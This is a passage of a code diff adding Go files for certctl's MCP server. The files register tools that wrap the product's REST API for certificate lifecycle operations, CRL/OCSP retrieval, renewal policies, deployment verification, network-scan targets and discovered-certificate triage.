||||||
|
// — Phase G P1-32/P1-34/P1-35 of the same audit). Co-locating these
|
||||||
|
// four register-functions matches the operator-mental-model boundary
|
||||||
|
// (everything a certificate-administrator touches in one file) and
|
||||||
|
// pre-dates the Sprint 10 split — tools_audit_fix.go + tools_auth.go +
|
||||||
|
// tools_auth_bundle2.go + tools_est.go already follow the same
|
||||||
|
// sibling-file convention.
|
||||||
|
|
||||||
|
// ── Certificates ────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerCertificateTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificates",
|
||||||
|
Description: "List managed certificates with optional filters for status, environment, owner, team, and issuer. Returns paginated results.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.Environment != "" {
|
||||||
|
q.Set("environment", input.Environment)
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
q.Set("owner_id", input.OwnerID)
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
q.Set("team_id", input.TeamID)
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
q.Set("issuer_id", input.IssuerID)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/certificates", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_certificate",
|
||||||
|
Description: "Get a specific certificate by ID. Returns full certificate details including status, expiry, owner, and tags.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_certificate",
|
||||||
|
Description: "Create a new managed certificate. Requires name, common_name, renewal_policy_id, issuer_id, owner_id, and team_id.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/certificates", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_certificate",
|
||||||
|
Description: "Update an existing certificate's metadata (name, environment, owner, tags, etc.).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/certificates/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_archive_certificate",
|
||||||
|
Description: "Archive (soft-delete) a certificate by ID.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/certificates/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificate_versions",
|
||||||
|
Description: "List all versions (renewals) of a certificate. Shows serial numbers, validity periods, and fingerprints.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListVersionsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID+"/versions", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_renewal",
|
||||||
|
Description: "Trigger immediate renewal of a certificate. Creates a renewal job (async, returns 202). Returns 404 if certificate not found, 400 if certificate is archived/expired, 409 if renewal already in progress.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/renew", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_deployment",
|
||||||
|
Description: "Trigger deployment of a certificate to its targets. Optionally specify a single target.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input TriggerDeploymentInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.TargetID != "" {
|
||||||
|
body["target_id"] = input.TargetID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/deploy", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_revoke_certificate",
|
||||||
|
Description: "Revoke a certificate with an optional RFC 5280 reason code. Records in audit trail and notifies the issuer.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RevokeCertificateInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Reason != "" {
|
||||||
|
body["reason"] = input.Reason
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/"+input.ID+"/revoke", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_revoke_certificates",
|
||||||
|
Description: "Bulk revoke certificates matching filter criteria. At least one criterion (profile_id, owner_id, agent_id, issuer_id, team_id, or certificate_ids) is required. Returns counts of matched, revoked, skipped, and failed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkRevokeCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{
|
||||||
|
"reason": input.Reason,
|
||||||
|
}
|
||||||
|
if input.ProfileID != "" {
|
||||||
|
body["profile_id"] = input.ProfileID
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
body["owner_id"] = input.OwnerID
|
||||||
|
}
|
||||||
|
if input.AgentID != "" {
|
||||||
|
body["agent_id"] = input.AgentID
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
body["issuer_id"] = input.IssuerID
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
if len(input.CertificateIDs) > 0 {
|
||||||
|
body["certificate_ids"] = input.CertificateIDs
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-revoke", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// L-1 master closure (cat-l-fa0c1ac07ab5): bulk-renew MCP tool.
|
||||||
|
// Mirrors certctl_bulk_revoke_certificates shape sans the Reason
|
||||||
|
// field. Server returns total_matched / total_enqueued /
|
||||||
|
// total_skipped / total_failed plus per-cert {certificate_id,
|
||||||
|
// job_id} pairs in enqueued_jobs.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_renew_certificates",
|
||||||
|
Description: "Bulk renew certificates matching filter criteria (profile_id, owner_id, agent_id, issuer_id, team_id) or an explicit certificate_ids list. At least one selector required. Returns counts of matched, enqueued, skipped, and failed certificates plus per-cert {certificate_id, job_id} pairs.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkRenewCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{}
|
||||||
|
if input.ProfileID != "" {
|
||||||
|
body["profile_id"] = input.ProfileID
|
||||||
|
}
|
||||||
|
if input.OwnerID != "" {
|
||||||
|
body["owner_id"] = input.OwnerID
|
||||||
|
}
|
||||||
|
if input.AgentID != "" {
|
||||||
|
body["agent_id"] = input.AgentID
|
||||||
|
}
|
||||||
|
if input.IssuerID != "" {
|
||||||
|
body["issuer_id"] = input.IssuerID
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
if len(input.CertificateIDs) > 0 {
|
||||||
|
body["certificate_ids"] = input.CertificateIDs
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-renew", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
// L-2 closure (cat-l-8a1fb258a38a): bulk-reassign MCP tool.
|
||||||
|
// Narrower than bulk-renew/revoke — IDs-only, no criteria-mode.
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_bulk_reassign_certificates",
|
||||||
|
Description: "Bulk reassign owner (and optionally team) for a set of certificates. owner_id is required. team_id is optional and updates only when non-empty. Returns counts of matched, reassigned, skipped (already-owned-by-target), and failed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input BulkReassignCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]interface{}{
|
||||||
|
"certificate_ids": input.CertificateIDs,
|
||||||
|
"owner_id": input.OwnerID,
|
||||||
|
}
|
||||||
|
if input.TeamID != "" {
|
||||||
|
body["team_id"] = input.TeamID
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/certificates/bulk-reassign", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── CRL & OCSP ──────────────────────────────────────────────────────
|
||||||
|
//
|
||||||
|
// M-006 relocation: CRL and OCSP are served unauthenticated under the
|
||||||
|
// RFC 8615 `.well-known/pki/*` namespace (RFC 5280 §5 for CRL, RFC 6960
|
||||||
|
// §2.1 for OCSP) so relying parties can retrieve them without a certctl
|
||||||
|
// API key. The non-standard JSON CRL tool (`certctl_get_crl`) has been
|
||||||
|
// removed — RFC 5280 defines only the DER wire format.
|
||||||
|
|
||||||
|
func registerCRLOCSPTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_der_crl",
|
||||||
|
Description: "Get DER-encoded X.509 CRL for a specific issuer (RFC 5280). Served unauthenticated at /.well-known/pki/crl/{issuer_id}. Returns binary CRL data signed by the issuing CA.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetDERCRLInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
raw, contentType, err := c.GetRaw("/.well-known/pki/crl/" + input.IssuerID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return &gomcp.CallToolResult{
|
||||||
|
Content: []gomcp.Content{
|
||||||
|
&gomcp.TextContent{Text: fmt.Sprintf("DER CRL retrieved (%d bytes, content-type: %s)", len(raw), contentType)},
|
||||||
|
},
|
||||||
|
}, nil, nil
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_ocsp_check",
|
||||||
|
Description: "Check OCSP status for a certificate by issuer ID and hex serial number (RFC 6960). Served unauthenticated at /.well-known/pki/ocsp/{issuer_id}/{serial}. Returns good, revoked, or unknown.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input OCSPInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
raw, contentType, err := c.GetRaw("/.well-known/pki/ocsp/" + input.IssuerID + "/" + input.Serial)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return &gomcp.CallToolResult{
|
||||||
|
Content: []gomcp.Content{
|
||||||
|
&gomcp.TextContent{Text: fmt.Sprintf("OCSP response retrieved (%d bytes, content-type: %s)", len(raw), contentType)},
|
||||||
|
},
|
||||||
|
}, nil, nil
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Renewal Policies (Phase C — P1-1..P1-5) ─────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. The G-1 milestone shipped
|
||||||
|
// renewal_policies as a separate resource from the policy engine; the GUI
|
||||||
|
// has the page and the API has full CRUD, but MCP previously had zero
|
||||||
|
// coverage. Note: the MCP "policy" tools registered by registerPolicyTools
|
||||||
|
// already point at /api/v1/renewal-policies (legacy alias) — these new tools
|
||||||
|
// expose the renewal-policy domain directly with explicit naming.
|
||||||
|
|
||||||
|
func registerRenewalPolicyTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_renewal_policies",
|
||||||
|
Description: "List renewal policies (GET /api/v1/renewal-policies). Each policy controls renewal-window, retry, and alert-threshold/severity matrix for managed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/renewal-policies", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_renewal_policy",
|
||||||
|
Description: "Get a single renewal policy (GET /api/v1/renewal-policies/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/renewal-policies/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_renewal_policy",
|
||||||
|
Description: "Create a renewal policy (POST /api/v1/renewal-policies). Required: name. Reasonable defaults exist server-side for renewal_window_days, retries, and alert thresholds.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateRenewalPolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/renewal-policies", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_renewal_policy",
|
||||||
|
Description: "Update a renewal policy (PUT /api/v1/renewal-policies/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateRenewalPolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/renewal-policies/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_renewal_policy",
|
||||||
|
Description: "Delete a renewal policy (DELETE /api/v1/renewal-policies/{id}). Returns HTTP 409 if any managed_certificates still reference the policy (FK-RESTRICT via ErrRenewalPolicyInUse).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/renewal-policies/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Verification (Phase G — P1-32, P1-34, P1-35) ────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. P1-33 (POST
|
||||||
|
// /api/v1/agents/{id}/discoveries) is intentionally excluded — it is a
|
||||||
|
// machine-to-machine push channel for agents reporting filesystem-scan
|
||||||
|
// results, not an operator-driven flow. The remaining three round out
|
||||||
|
// MCP coverage of certificate-deployment and job-verification surfaces.
|
||||||
|
|
||||||
|
func registerVerificationTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificate_deployments",
|
||||||
|
Description: "List deployments for a managed certificate (GET /api/v1/certificates/{id}/deployments). Returns the per-target deployment status rows for the named cert.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID+"/deployments", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_verify_job",
|
||||||
|
Description: "Record post-deployment verification for a job (POST /api/v1/jobs/{id}/verify). Required: target_id, expected_fingerprint, actual_fingerprint. Typically called by agents after probing the live TLS endpoint, but exposed here for operator-driven manual verification.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input VerifyJobInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]any{
|
||||||
|
"target_id": input.TargetID,
|
||||||
|
"expected_fingerprint": input.ExpectedFingerprint,
|
||||||
|
"actual_fingerprint": input.ActualFingerprint,
|
||||||
|
"verified": input.Verified,
|
||||||
|
}
|
||||||
|
if input.Error != "" {
|
||||||
|
body["error"] = input.Error
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/verify", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_job_verification",
|
||||||
|
Description: "Get the recorded verification status for a job (GET /api/v1/jobs/{id}/verification). Returns the latest VerificationResult row (expected/actual fingerprint, verified bool, timestamp).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/jobs/"+input.ID+"/verification", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,168 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the discovery MCP tool domain:
|
||||||
|
//
|
||||||
|
// - registerNetworkScanTools — Phase D P1-14..P1-19 — network-scan
|
||||||
|
// target CRUD + manual-scan trigger. Drives the inbound side of
|
||||||
|
// the discovery pipeline (the server-initiated scans against
|
||||||
|
// CIDRs / hostnames the operator declared).
|
||||||
|
// - registerDiscoveryReadTools — Phase E P1-10..P1-13 — read-side
|
||||||
|
// surface for discovered certificates (list / get / claim /
|
||||||
|
// dismiss). The claim + dismiss subtools also exist under
|
||||||
|
// registerHealthTools for historical-placement reasons
|
||||||
|
// (pre-2026-05-05 I-2 closure parked them with the health
|
||||||
|
// surface); those duplicate registrations are intentional and
|
||||||
|
// documented in the pre-extract comments at the Discovery
|
||||||
|
// read-side banner.
|
||||||
|
|
||||||
|
// ── Network-Scan Targets (Phase D — P1-14..P1-19) ───────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. AI-assistant queries like
|
||||||
|
// "what new certs did the scanner find on my fleet?" or "trigger a scan of
|
||||||
|
// the DC1 web tier" had no MCP path. trigger_network_scan returns the
|
||||||
|
// scan-row body so the AI can subsequently call list_discovered_certificates.
|
||||||
|
|
||||||
|
func registerNetworkScanTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_network_scan_targets",
|
||||||
|
Description: "List network-scan targets (GET /api/v1/network-scan-targets). Each target is a (CIDR, ports) tuple the scheduler probes for TLS certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/network-scan-targets", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_network_scan_target",
|
||||||
|
Description: "Get a single network-scan target (GET /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/network-scan-targets/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_network_scan_target",
|
||||||
|
Description: "Create a network-scan target (POST /api/v1/network-scan-targets). Provide cidrs and ports for the scanner to probe (e.g. cidrs=['10.0.0.0/24'], ports=[443,8443]).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateNetworkScanTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/network-scan-targets", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_network_scan_target",
|
||||||
|
Description: "Update a network-scan target (PUT /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateNetworkScanTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/network-scan-targets/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_network_scan_target",
|
||||||
|
Description: "Delete a network-scan target (DELETE /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/network-scan-targets/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_network_scan",
|
||||||
|
Description: "Trigger an immediate network scan of a target (POST /api/v1/network-scan-targets/{id}/scan). Returns the discovery-scan body when certs are found; the AI can then call certctl_list_discovered_certificates filtered by agent_id to view results.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/network-scan-targets/"+input.ID+"/scan", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Discovery read-side (Phase E — P1-10..P1-13) ────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. The MCP server already
|
||||||
|
// has certctl_claim_discovered_certificate + certctl_dismiss_discovered_certificate
|
||||||
|
// (registered by registerHealthTools — historical placement; see I-2 closure).
|
||||||
|
// This phase adds the read-side so operators can ask "what's in the triage
|
||||||
|
// queue?" and "what did the scanner pick up overnight?".
|
||||||
|
|
||||||
|
func registerDiscoveryReadTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_discovered_certificates",
|
||||||
|
Description: "List discovered certificates (GET /api/v1/discovered-certificates). These are TLS certs found by agent filesystem scans + network scans that are not yet under management. Filter by agent_id and/or status (Unmanaged, Managed, Dismissed).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListDiscoveredCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.AgentID != "" {
|
||||||
|
q.Set("agent_id", input.AgentID)
|
||||||
|
}
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/discovered-certificates", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_discovered_certificate",
|
||||||
|
Description: "Get a single discovered certificate (GET /api/v1/discovered-certificates/{id}). Returns the dc-* row including subject DN, SANs, fingerprint, observed-at endpoint, and managed_certificate_id (set if claimed).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/discovered-certificates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_discovery_scans",
|
||||||
|
Description: "List discovery-scan rows (GET /api/v1/discovery-scans). Each row records one agent filesystem scan or network scan run with timing + cert-count.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListDiscoveryScansInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.AgentID != "" {
|
||||||
|
q.Set("agent_id", input.AgentID)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/discovery-scans", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_discovery_summary",
|
||||||
|
Description: "Return aggregate counts of discovered-certificate states (GET /api/v1/discovery-summary). Useful for triage-queue dashboard queries.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/discovery-summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,169 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the workflow MCP tool domain: jobs (the renewal
|
||||||
|
// + deployment work queue — registerJobTools) and approvals (the
|
||||||
|
// human-in-the-loop gate that fronts every CertificateProfile with
|
||||||
|
